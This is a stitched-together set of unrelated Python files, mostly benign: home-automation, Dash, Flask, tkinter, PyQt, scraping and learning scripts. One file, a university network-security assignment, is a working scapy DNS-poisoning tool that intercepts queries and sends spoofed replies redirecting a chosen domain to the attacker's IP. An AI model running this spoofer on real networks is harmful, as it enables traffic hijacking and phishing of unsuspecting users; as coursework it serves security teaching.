def run(self):
pass
def getTriggerState(self):
pass
def executeAction(self):
pass
class WemoHueRecipe(Recipe):
def __init__(self, wemoController, hueController, switchName, lightId):
self.wemoController = wemoController
self.hueController = hueController
self.lightId = lightId
self.switchName = switchName
self.triggerStateList = [(self.wemoController.getSwitchState(switchName), datetime.now())]
print("triggerState", self.triggerStateList)
self.eventList = []
self.queueSize = 50
def run(self):
newState = self.wemoController.getSwitchState(self.switchName)
if newState == self.triggerStateList[-1][0]:
return
self.triggerStateList.append((newState, datetime.now()))
print("triggerStateList", self.triggerStateList)
if newState == 1:
print("execute action")
self.hueController.turnonLight(self.lightId)
self.eventList.append(datetime.now())
if len(self.triggerStateList) == self.queueSize:
self.triggerStateList.pop(0)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-lightId", default = 2, type = int)
parser.add_argument("-sleep", default = 1, type = float)
parser.add_argument("-wemoport", type = int, default = 10085)
options = parser.parse_args()
hueController = hue.HueController()
bind = "0.0.0.0:{}".format(options.wemoport)
switchName = "WeMo Switch1"
lightId = options.lightId
wemoController = wemo.WemoController(bind = bind)
switch = wemoController.discoverSwitch(switchName)
if switch is None:
print("error to locate the switch")
sys.exit(1)
else:
print("switch discoverred")
#test recipe: when wemo switch is truned on, turn on lights in living room
hueController.turnonLight(lightId)
time.sleep(3)
hueController.turnoffLight(lightId)
recipe = WemoHueRecipe(wemoController, hueController, switchName, lightId)
recipeList = [recipe]
while True:
time.sleep(options.sleep)
for recipe in recipeList:
recipe.run()
|
import dash_bootstrap_components as dbc
from dash import Input, Output, html
nav = html.Div(
[
dbc.Nav(
[
dbc.NavLink("Internal link", href="/l/components/nav"),
dbc.NavLink("External link", href="https://github.com"),
dbc.NavLink(
"External relative",
href="/l/components/nav",
external_link=True,
),
dbc.NavLink("Button", id="button-link", n_clicks=0),
]
),
html.Br(),
html.P(id="button-clicks"),
]
)
@app.callback(
Output("button-clicks", "children"), [Input("button-link", "n_clicks")]
)
def show_clicks(n):
return "Button clicked {} times".format(n)
|
# Import flask dependencies
from flask import Blueprint, jsonify, request, render_template, \
flash, g, session, redirect, url_for
# Import password / encryption helper tools
from werkzeug import check_password_hash, generate_password_hash
import calendar
from datetime import datetime, timedelta
# Import the database object from the main app module
from app import db
# Import module forms
from app.weather.forms import CreateWeatherForm
# Import module models (i.e. Weather)
from app.weather.models import Weather
import json
from app.public.helper import get_operating_hours
# Define the blueprint: 'weather', set its url prefix: app.url/weather
weather = Blueprint('weather', __name__, url_prefix='/weather', static_folder="../static")
@weather.route("/daily")
@weather.route("/daily/<date>")
def daily(date=datetime.now().strftime('%Y-%m-%d')):
try:
current_date = datetime.strptime(date, "%Y-%m-%d")
except ValueError, TypeError:
current_date = datetime.strptime('2014-04-21', "%Y-%m-%d")
yesterday = current_date - timedelta(days=1)
tomorrow = current_date + timedelta(days=1)
w = Weather.query.with_entities(Weather.created_at, Weather.temp).filter(
Weather.created_at > current_date.strftime('%Y-%m-%d')).filter(
Weather.created_at < tomorrow.strftime('%Y-%m-%d')).all()
timestamps_w = [
1000 * calendar.timegm(datetime.strptime(d.created_at.split(".")[0], "%Y-%m-%d %H:%M:%S").timetuple())
for d in w]
series_w = [(int(d.temp or 0)) for d in w]
daily_chart_data = [list(x) for x in zip(timestamps_w, series_w)]
print daily_chart_data
return render_template("weather/daily.html", data=daily_chart_data, yesterday=yesterday,
today=current_date, tomorrow=tomorrow, all_data=w)
@weather.route("/tempature")
@weather.route("/tempature/<date>")
def getTempature():
obj = Weather.query.with_entities(Weather.created_at, Weather.temp).order_by(Weather.created_at.desc()).first()
array = [obj.created_at, obj.temp]
# print "Array :" + str(array)
timestamps_w = 1000 * calendar.timegm(datetime.strptime(obj.created_at.split(".")[0], "%Y-%m-%d %H:%M:%S").timetuple())
series_w = int(obj.temp or 0)
daily_chart_data = [timestamps_w, series_w]
row_json = json.dumps(daily_chart_data)
# print "==============="
# print "success ---- 1"
# print "==============="
return row_json
|
# -*- coding: utf-8 -*-
from collections import Counter, defaultdict, deque
class Solution:
def minWindow(self, s, t):
best_first, best_last, best_length = 0, len(s) - 1, len(s) + 1
counts, occurrences = Counter(t), defaultdict(deque)
for i, c in enumerate(s):
if c not in counts:
continue
occurrences[c].append(i)
if counts[c] < len(occurrences[c]):
occurrences[c].popleft()
if best_length == len(s) + 1:
if any(counts[c] > len(occurrences[c]) for c in counts):
continue
current_first = min(occurrences[c][0] for c in counts)
current_last = max(occurrences[c][-1] for c in counts) + 1
if current_last - current_first < best_length:
best_first = current_first
best_last = current_last
best_length = current_last - current_first
return s[best_first:best_last] if best_length != len(s) + 1 else ""
if __name__ == "__main__":
solution = Solution()
assert "BANC" == solution.minWindow("ADOBECODEBANC", "ABC")
assert "aa" == solution.minWindow("aa", "aa")
assert "" == solution.minWindow("a", "b")
assert "cwae" == solution.minWindow("cabwefgewcwaefgcf", "cae")
|
from tkinter import *
import math
root = Tk()
root.title("calculator")
e = Entry(root,width = 35,borderwidth = 5)
e.grid(row = 0,column = 0,columnspan = 3,padx = 10,pady=10)
def button_click(number):
current = e.get()
e.delete(0,END)
e.insert(0,str(current) + str(number))
def button_clear():
e.delete(0,END)
def button_add():
first_number = e.get()
global f_num
global math
math = "addition"
f_num = int(first_number)
e.delete(0,END)
def button_equal():
second_number = e.get()
e.delete(0,END)
if math == "addition":
e.insert(0,f_num + int(second_number))
elif math == "division":
e.insert(0,f_num / int(second_number))
elif math == "multiplication":
e.insert(0,f_num * int(second_number))
elif math == "subtraction":
e.insert(0,f_num - int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = "subtraction"
f_num = int(first_number)
e.delete(0,END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = "multiplication"
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = "division"
f_num = int(first_number)
e.delete(0, END)
button_1 = Button(root,text = "1", padx=40,pady=20,command =lambda:button_click(1))
button_2 = Button(root,text = "2", padx=40,pady=20,command=lambda:button_click(2))
button_3 = Button(root,text = "3", padx=40,pady=20,command=lambda:button_click(3))
button_4 = Button(root,text = "4", padx=40,pady=20,command=lambda:button_click(4))
button_5 = Button(root,text = "5", padx=40,pady=20,command=lambda:button_click(5))
button_6 = Button(root,text = "6", padx=40,pady=20,command=lambda:button_click(6))
button_7 = Button(root,text = "7", padx=40,pady=20,command=lambda:button_click(7))
button_8 = Button(root,text = "8", padx=40,pady=20,command=lambda:button_click(8))
button_9 = Button(root,text = "9", padx=40,pady=20,command=lambda:button_click(9))
button_0 = Button(root,text = "0", padx=40,pady=20,command=lambda:button_click(0))
button_add = Button(root,text="+",padx=39,pady=20,command =button_add)
button_equal = Button(root,text="=",padx=87.4,pady=20,command =button_equal)
button_clear = Button(root,text="CLEAR",padx=73.7,pady=20,command =button_clear)
button_subtract = Button(root,text= "-",padx=41,pady=21,command=button_subtract)
button_multiply = Button(root,text= "*",padx=40,pady=21,command=button_multiply)
button_divide = Button(root,text= "/",padx=41,pady=21,command=button_divide)
button_1.grid(row=3,column=0)
button_2.grid(row=3,column=1)
button_3.grid(row=3,column=2)
button_4.grid(row=2,column=0)
button_5.grid(row=2,column=1)
button_6.grid(row=2,column=2)
button_7.grid(row=1,column=0)
button_8.grid(row=1,column=1)
button_9.grid(row=1,column=2)
button_0.grid(row=4,column=0)
button_clear.grid(row = 4, column=1,columnspan =2)
button_equal.grid(row=5,column = 1,columnspan=2)
button_add.grid(row = 5,column=0)
button_subtract.grid(row=6,column=2)
button_multiply.grid(row=6,columnspan=3)
button_divide.grid(row=6,column=0)
root.mainloop()
|
def lenIter(aStr):
aStr = aStr.lower()
i = 0
for c in aStr:
i += 1
return i
print(lenIter('svcd'))
|
from core.web import Web
from core.view import View
web = Web('127.0.0.1', 8000)
view = View()
|
"""
Python Version 3.8
Singapore Institute of Technology (SIT)
Information and Communications Technology (Information Security), BEng (Hons)
ICT-2203 Network Security Assignment 1
Author: @ Clement Chin / 1802951
Academic Year: 2020/2021
Lecturer: Woo Wing Keong
Submission Date: 25th October 2020
This script holds the code to perform DNS Poisoning.
> Allow all normal traffic to pass through, acting as a middle man forwarding all the DNS packets
> Once user enter a URL that is stated in MALICIOUS_IP, he/she will be redirected to MALICIOUS_IP
"""
import logging
from scapy.all import *
IFACE = conf.iface
QUERY = 0
RESPONSE = 1
MY_IP = get_if_addr(IFACE)
# Server Flags
DNS_SERVER = "8.8.8.8"
# Attacker Flags
MALICIOUS_SITE = b"secret.companyxyz.com."
MALICIOUS_IP = MY_IP
# Logging Configuration
LOG_FILE_DIR = os.path.abspath("logs/dns_poison.txt")
logging.basicConfig(filename=LOG_FILE_DIR,
filemode='w',
level=logging.DEBUG,
format='%(asctime)s %(message)s',
datefmt='%d/%m/%Y %I:%M:%S %p')
def dns_pkt_filter(pkt):
""" Filters the incoming sniffed packet and parse to dns_reply """
try:
if pkt[IP].dst == MY_IP and pkt.haslayer(DNS):
return pkt[UDP].dport == 53 and pkt[DNS].qr == QUERY
return False
except:
pass
def dns_reply(pkt):
""" Reply the client with the Fake DNS Reply """
try:
# Retrieve the DNS Question Name
qname = pkt[DNSQR].qname
# Let user browse through normal traffic
if qname != MALICIOUS_SITE:
dns_req = IP(dst=DNS_SERVER) \
/ UDP(dport=53) \
/ DNS(rd=1, qd=DNSQR(qname=qname))
ans = sr1(dns_req, verbose=0)
domain_ip = ans[DNSRR].rdata
# User tries to access the site we want to spoof
else:
domain_ip = MALICIOUS_IP
logging.info(f"[*] Redirecting {pkt[IP].src} to {MALICIOUS_IP}")
# Craft the Spoofed DNS Packet and send to requested Client
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) \
/ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) \
/ DNS(id=pkt[DNS].id,
qr=RESPONSE,
qd=pkt[DNS].qd,
an=DNSRR(rrname=qname, type='A', ttl=124, rdata=domain_ip),
ancount=1)
send(spoofed_pkt, verbose=0)
logging.info(f"[*] Resolve {qname} for Client: {pkt[IP].src}")
# Ignore all other traffic errors
except:
pass
def main():
""" Main Sniffer Function """
logging.info("[*] Starting DNS Posioning ...")
sniff(lfilter=dns_pkt_filter, prn=dns_reply, iface=IFACE)
if __name__ == '__main__':
main() |
from crawlers.spiders.squawka import SquawkaSpider
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from squawka import utils
import json
import subprocess
COMPETITION_IDS = [8, 5, 6, 9, 21, 22, 23, 24]
def load_json(file_name):
with open(file_name) as json_data:
d = json.load(json_data)
return d
def write_json(file_name, json_data):
with open(file_name, 'w') as outfile:
json.dump(json_data, outfile)
return json_data
downloaded = load_json('downloaded.json')
for year in range(2017, 2008, -1):
for competition_id in COMPETITION_IDS:
if [competition_id, year] in downloaded:
print year, utils.COMPETITIONS[competition_id], 'downloaded'
continue
print year, utils.COMPETITIONS[competition_id], 'start'
process = CrawlerProcess(get_project_settings())
process.crawl(
SquawkaSpider, competition_id=competition_id, season=year)
process.start()
# cmd = [
# "scrapy", "crawl squawka -a competition_id=" + str(competition_id)
# + " -a season=" + str(year)
# ]
# process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# process.wait()
# print process.returncode
print year, utils.COMPETITIONS[competition_id], 'end'
downloaded.append([competition_id, year])
write_json('downloaded.json', downloaded)
|
def sumar(number1, number2=20):
print number1 # 15
print number2 # 10
print number1 + number2
sumar(number2=10, number1=15) |
import sys
from urllib2 import urlopen
from json import loads
def dict_recurse(data, search, results=None):
# init results on first call
if results is None:
results = set()
if isinstance(data, dict):
for key, value in data.items():
if key == search:
results.add(value)
else:
dict_recurse(value, search, results)
elif isinstance(data, (list, tuple)):
for value in data:
dict_recurse(value, search, results)
return results
def get_hrefs(url, seen=set()):
if url in seen:
return []
print url
seen.add(url)
data = loads(urlopen(url, timeout=5).read())
hrefs = dict_recurse(data, 'href')
return [href for href in hrefs if href not in seen]
hrefs = [sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080/api/v1/index']
while hrefs:
new = set()
map(new.update, map(get_hrefs, hrefs))
hrefs = new
|
import sys
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QStatusBar, QMainWindow, QApplication, QWidget,QHBoxLayout, qApp, QVBoxLayout, QPushButton, QSlider, QLCDNumber, QLabel, QAction
from PyQt5.QtGui import QIcon
class MyMainWindow(QMainWindow):
def __init__(self, parent=None):
super().__init__()
self.main_widget = FormWidget(self)
self.setCentralWidget(self.main_widget)
self.init_UI()
def init_UI(self):
exitAction = QAction(QIcon('exit.png'), '&Выход', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(qApp.quit)
sourceAction = QAction(QIcon('exit.png'), '&Источники', self)
sourceAction.setShortcut('Ctrl+S')
sourceAction.setStatusTip('Exit application')
statusAction = QAction(QIcon('exit.png'), '&Статус', self)
statusAction.setShortcut('Ctrl+S')
statusAction.setStatusTip('Exit application')
sellerAction = QAction(QIcon('exit.png'), '&Контрагент', self)
sellerAction.setShortcut('Ctrl+S')
sellerAction.setStatusTip('Exit application')
kosguAction = QAction(QIcon('exit.png'), '&КОСГУ', self)
kosguAction.setShortcut('Ctrl+S')
kosguAction.setStatusTip('Exit application')
yearAction = QAction(QIcon('exit.png'), '&Год', self)
yearAction.setShortcut('Ctrl+S')
yearAction.setStatusTip('Exit application')
methodAction = QAction(QIcon('exit.png'), '&Метод', self)
methodAction.setShortcut('Ctrl+S')
methodAction.setStatusTip('Exit application')
typesAction = QAction(QIcon('exit.png'), '&Тип', self)
typesAction.setShortcut('Ctrl+S')
typesAction.setStatusTip('Exit application')
self.statusBar()
menubar = self.menuBar()
fileMenu = menubar.addMenu('&Файл')
fileMenu.addAction(exitAction)
libMenu = menubar.addMenu('&Справочники')
libMenu.addAction(statusAction)
libMenu.addAction(sourceAction)
libMenu.addAction(sellerAction)
libMenu.addAction(kosguAction)
libMenu.addAction(yearAction)
libMenu.addAction(methodAction)
libMenu.addAction(typesAction)
self.setGeometry(300, 300, 300, 200)
self.setWindowTitle('Menubar')
self.show()
self.statusbar = self.statusBar()
self.statusbar.showMessage('Ready')
self.setGeometry(200, 100, 300, 300)
self.setWindowTitle('Central Widget')
self.show()
class FormWidget(QWidget):
def __init__(self, parent):
super(FormWidget, self).__init__(parent)
self.parent = parent
self.init_UI()
def init_UI(self):
hbox = QHBoxLayout()
button_1 = QPushButton('Button 1', self)
button_1.clicked.connect(self.buttonClicked)
hbox.addWidget(button_1)
button_2 = QPushButton('Button 2', self)
button_2.clicked.connect(self.buttonClicked)
hbox.addWidget(button_2)
self.setLayout(hbox)
self.setGeometry(200, 100, 300, 300)
self.setWindowTitle('Slider and LCD')
self.show()
def buttonClicked(self):
sender = self.sender()
self.parent.statusbar.showMessage(sender.text() + ' was clicked')
if __name__ == '__main__':
APP = QApplication(sys.argv)
ex = MyMainWindow()
sys.exit(APP.exec_())
|
# for loop
#strings
frase = 'linux open software specialists'
vogais = 'aeiou'
conta_vogais = 0
for letra in frase:
if letra in vogais:
conta_vogais += 1
print('A frase tem', conta_vogais, 'vogais')
exit()
'''
frutas = ['Bana', 'Cajú', 'Laranja'
, 'Abacate']
for fruta in frutas:
print(ruta)
exit()
for number in range(1, 10):
print(number)
exit()
for numero in range(2, 40, 4):
if numero % 2 == 0:
print(numero)
exit()
frutas = ['Bana', 'Cajú', 'Laranja', 'Abacate']
for_each fruta in frutas:
print(each_fruta)
'''
|
#coding:utf8
#python的作用 1 处理工具 操控excel实现exel功能
#2 数据处理 数据交换
#3 分析引擎 替代 vba
import xlrd,xlwt
import pandas as pd
import numpy as np
import xlsxwriter
#
path='./data/'
#
# wb=xlwt.Workbook()
#
# wb.add_sheet('first_sheet',cell_overwrite_ok=True)
#
# ws_1=wb.get_sheet(0)
#
# ws_2=wb.add_sheet('second_sheet')
#
# data=np.arange(1,65).reshape(8,8)
#
#
#
# values=np.random.standard_normal(15).cumsum()
# ws_1.write(0,0,100)
# wb.save(path+'workbook2.xls')
#2---------------------------
# import xlrd,xlwt
# import pandas as pd
# import numpy as np
# import xlsxwriter
#
# path='./data/'
#
# wb=xlsxwriter.Workbook()
#
# wb.add_worksheet('first_sheet',cell_overwrite_ok=True)
#
# ws_1=wb.get_sheet(0)
#
#
#
# data=np.arange(1,65).reshape(8,8)
#
#
#
# values=np.random.standard_normal(15).cumsum()
# ws_1.write(0,0,100)
# ws_1.write_colum('a1',values)
# wb.save(path+'workbook2.xls')
#pandas 交互
data=np.random.standard_normal((8,8)).round(5)
df_1=pd.read_excel(path+'workbook2.xls','first_sheet',header=None)
df_2=pd.read_excel(path+'workbook2.xls','second_sheet',header=None)
import string
columns= []
for c in range(8):
columns.append(string.uppercase[c])
print df_1
df_1.columns=columns
print df_1
df_1.to_excel(path+'newbookwork.xlsx','mysheet')
#xlrd读 dataframe 对象
wbn=xlrd.open_workbook(path+'newbookwork.xlsx')
print wbn.sheet_names()
#python 编写excel脚本:用datanitro 代替vba
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.